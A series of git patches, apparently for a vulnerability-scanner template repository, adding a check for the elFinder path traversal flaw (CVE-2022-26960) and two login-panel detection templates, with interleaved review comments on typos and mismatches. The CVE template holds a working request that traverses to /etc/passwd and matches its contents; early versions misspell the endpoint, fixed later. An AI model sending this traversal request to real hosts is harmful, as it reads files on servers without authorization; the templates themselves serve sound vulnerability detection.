From ec5b5300251aa3828520e12626fd609af77403ee Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:18:26 -0400
Subject: [PATCH 01/10] Create CVE-2022-0543
---
cves/2022/CVE-2022-0543 | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 cves/2022/CVE-2022-0543
diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
new file mode 100644
index 0000000000..c259789775
--- /dev/null
+++ b/cves/2022/CVE-2022-0543
@@ -0,0 +1,25 @@
+id: CVE-2022-0543
+
+info:
+ name: elFinder - Path Traversal
+ author: PIKPIKCU
+ severity: critical
+ description: |
+ Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+ reference:
+ - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+ tags: cve,cve2022,lfi,elfinder
+
+requests:
+ - raw:
+ - |
+ GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
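Review bot: The template `id: CVE-2022-0543` does not match its own NVD reference (`CVE-2022-26960`) or the elFinder description, so any finding from this file would be reported and triaged under the wrong CVE. The id should be `id: CVE-2022-26960` and the file named `cves/2022/CVE-2022-26960.yaml`, since the path added here also has no `.yaml` extension. The request line spells the endpoint `connectot.minimal.php` and ends the encoded segment with a second `<@base64>` rather than `<@/base64>`, which would make the check miss vulnerable hosts without any error; the same request line is added again in the `cves/2022/CVE-2022-26960.yaml` hunk of patch 05. With a single matcher, `matchers-condition: and` has no effect here.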
From 789f6596456dccc59a2555b770e3651c54ec6e58 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:19:18 -0400
Subject: [PATCH 02/10] Update CVE-2022-0543
---
cves/2022/CVE-2022-0543 | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
index c259789775..015a33cf3d 100644
--- a/cves/2022/CVE-2022-0543
+++ b/cves/2022/CVE-2022-0543
@@ -2,7 +2,7 @@ id: CVE-2022-0543
info:
name: elFinder - Path Traversal
- author: PIKPIKCU
+ author: pikpikcu
severity: critical
description: |
Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
From 732217c33ab59c3fc3e2c9cbb4a67be7f4abf502 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:29:04 -0400
Subject: [PATCH 03/10] Create docebo-detect.yaml
---
technologies/docebo-detect.yaml | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 technologies/docebo-detect.yaml
diff --git a/technologies/docebo-detect.yaml b/technologies/docebo-detect.yaml
new file mode 100644
index 0000000000..95ff301e51
--- /dev/null
+++ b/technologies/docebo-detect.yaml
@@ -0,0 +1,25 @@
+id: docebo-detect
+
+info:
+ name: Docebo Detect
+ author: pikpikcu
+ severity: info
+ metadata:
+ fofa-query: title="Docebo E-learning"
+ tags: tech,docebo
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "
Docebo E-learning"
+
+ - type: status
+ status:
+ - 200
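Review bot: The `words` matcher searches the whole response body for the product name, while the `fofa-query` in the same hunk keys on the page title, so any 200 page that merely mentions the name is reported as a detection. Narrowing the match to the title element, or adding a second product-specific word with `condition: and` on the matcher, would cut false positives in asset inventories built from this template. As shown here the quoted word is also split across two lines, which may be a rendering artifact but should be checked in the file itself. The `technologies/powerjob-detect.yaml` hunk in patch 06 has the same shape with the bare word `PowerJob`.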
From 6735f99a543652f086c1b4b10e9c47439d8d3f22 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:29:52 -0400
Subject: [PATCH 04/10] Delete CVE-2022-0543
---
cves/2022/CVE-2022-0543 | 25 -------------------------
1 file changed, 25 deletions(-)
delete mode 100644 cves/2022/CVE-2022-0543
diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
deleted file mode 100644
index 015a33cf3d..0000000000
--- a/cves/2022/CVE-2022-0543
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2022-0543
-
-info:
- name: elFinder - Path Traversal
- author: pikpikcu
- severity: critical
- description: |
- Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
- reference:
- - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
- tags: cve,cve2022,lfi,elfinder
-
-requests:
- - raw:
- - |
- GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
From 53a775abd2c0a58d9185c5d9818e0988f634a119 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:31:46 -0400
Subject: [PATCH 05/10] Create CVE-2022-26960.yaml
---
cves/2022/CVE-2022-26960.yaml | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 cves/2022/CVE-2022-26960.yaml
diff --git a/cves/2022/CVE-2022-26960.yaml b/cves/2022/CVE-2022-26960.yaml
new file mode 100644
index 0000000000..d524eab2d5
--- /dev/null
+++ b/cves/2022/CVE-2022-26960.yaml
@@ -0,0 +1,25 @@
+id: CVE-2022-26960
+
+info:
+ name: elFinder - Path Traversal
+ author: pikpikcu
+ severity: critical
+ description: |
+ Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+ reference:
+ - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+ tags: cve,cve2022,lfi,elfinder
+
+requests:
+ - raw:
+ - |
+ GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
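Review bot: The request hard-codes both the `/elfinder/php/` URL prefix and the `/var/www/html/elfinder/files/` volume root, so the check only fires on an install laid out exactly that way, and a non-match says nothing about whether a host is patched. That limit should be stated in the template, for example as a comment above `requests:` reading `# Assumes the default /elfinder/ path and a /var/www/html document root; no match is not proof of a fixed version.` The info block also gives no `remediation`; the description's own wording supports `remediation: Upgrade elFinder to a release later than 2.1.60.`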
From f7153e19af2afa6b7c82ce13677702087571821a Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:51:40 -0400
Subject: [PATCH 06/10] Create powerjob-detect.yaml
---
technologies/powerjob-detect.yaml | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 technologies/powerjob-detect.yaml
diff --git a/technologies/powerjob-detect.yaml b/technologies/powerjob-detect.yaml
new file mode 100644
index 0000000000..fae537f6af
--- /dev/null
+++ b/technologies/powerjob-detect.yaml
@@ -0,0 +1,25 @@
+id: powerjob-detect
+
+info:
+ name: PowerJob Detect
+ author: pikpikcu
+ severity: info
+ metadata:
+ fofa-query: title="PowerJob"
+ tags: tech,powerjob
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "PowerJob"
+
+ - type: status
+ status:
+ - 200
From 8848779eae68c2e3af7671533c7a75109a855e70 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 4 Jul 2022 17:21:12 +0530
Subject: [PATCH 07/10] Update and rename technologies/docebo-detect.yaml to
exposed-panels/docebo-elearning-panel.yaml
---
.../docebo-elearning-panel.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
rename technologies/docebo-detect.yaml => exposed-panels/docebo-elearning-panel.yaml (72%)
diff --git a/technologies/docebo-detect.yaml b/exposed-panels/docebo-elearning-panel.yaml
similarity index 72%
rename from technologies/docebo-detect.yaml
rename to exposed-panels/docebo-elearning-panel.yaml
index 95ff301e51..1144fc5667 100644
--- a/technologies/docebo-detect.yaml
+++ b/exposed-panels/docebo-elearning-panel.yaml
@@ -1,12 +1,12 @@
-id: docebo-detect
+id: docebo-elearning-panel
info:
- name: Docebo Detect
+ name: Docebo E-learning Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="Docebo E-learning"
- tags: tech,docebo
+ tags: panel,docebo
requests:
- method: GET
@@ -18,7 +18,7 @@ requests:
- type: word
part: body
words:
- - "Docebo E-learning"
+ - "Docebo E-learning"
- type: status
status:
From 8a40ab6de85eba6c78bfde7a1c6ea0fbad7e205d Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 4 Jul 2022 17:25:24 +0530
Subject: [PATCH 08/10] Update and rename technologies/powerjob-detect.yaml to
exposed-panels/powerjob-panel.yaml
---
.../powerjob-panel.yaml | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
rename technologies/powerjob-detect.yaml => exposed-panels/powerjob-panel.yaml (78%)
diff --git a/technologies/powerjob-detect.yaml b/exposed-panels/powerjob-panel.yaml
similarity index 78%
rename from technologies/powerjob-detect.yaml
rename to exposed-panels/powerjob-panel.yaml
index fae537f6af..2cfd129e20 100644
--- a/technologies/powerjob-detect.yaml
+++ b/exposed-panels/powerjob-panel.yaml
@@ -1,12 +1,13 @@
-id: powerjob-detect
+id: powerjob-panel
info:
- name: PowerJob Detect
+ name: PowerJob Login Panel
author: pikpikcu
severity: info
metadata:
+ verified: true
fofa-query: title="PowerJob"
- tags: tech,powerjob
+ tags: panel,powerjob
requests:
- method: GET
From d239dee390ad79b22bd681931c3cbf4d9fe2f9be Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 4 Jul 2022 17:25:32 +0530
Subject: [PATCH 09/10] Update docebo-elearning-panel.yaml
---
exposed-panels/docebo-elearning-panel.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/exposed-panels/docebo-elearning-panel.yaml b/exposed-panels/docebo-elearning-panel.yaml
index 1144fc5667..1e0c7a6814 100644
--- a/exposed-panels/docebo-elearning-panel.yaml
+++ b/exposed-panels/docebo-elearning-panel.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: info
metadata:
+ verified: true
fofa-query: title="Docebo E-learning"
tags: panel,docebo
From 01e8acba05822a1dd74ffe6438d9f4af5eed27fd Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 4 Jul 2022 18:02:11 +0530
Subject: [PATCH 10/10] Update CVE-2022-26960.yaml
---
cves/2022/CVE-2022-26960.yaml | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-26960.yaml b/cves/2022/CVE-2022-26960.yaml
index d524eab2d5..6093524c0e 100644
--- a/cves/2022/CVE-2022-26960.yaml
+++ b/cves/2022/CVE-2022-26960.yaml
@@ -3,18 +3,20 @@ id: CVE-2022-26960
info:
name: elFinder - Path Traversal
author: pikpikcu
- severity: critical
+ severity: high
description: |
Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+ metadata:
+ verified: true
tags: cve,cve2022,lfi,elfinder
requests:
- raw:
- |
- GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
+ GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
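Review bot: The severity is lowered from `critical` to `high` without anything in the info block recording the basis, while the description kept as context still says unauthenticated attackers can read and write files outside the document root. Adding a `classification` block next to `metadata` would make the rating traceable: `cve-id: CVE-2022-26960` and `cwe-id: CWE-22`, plus the `cvss-metrics` and `cvss-score` copied from the NVD entry already listed under `reference`. If `high` was chosen because this template only demonstrates file read, a one-line comment saying so would keep downstream triage from reading it as the CVE's overall rating.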
@@ -23,3 +25,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200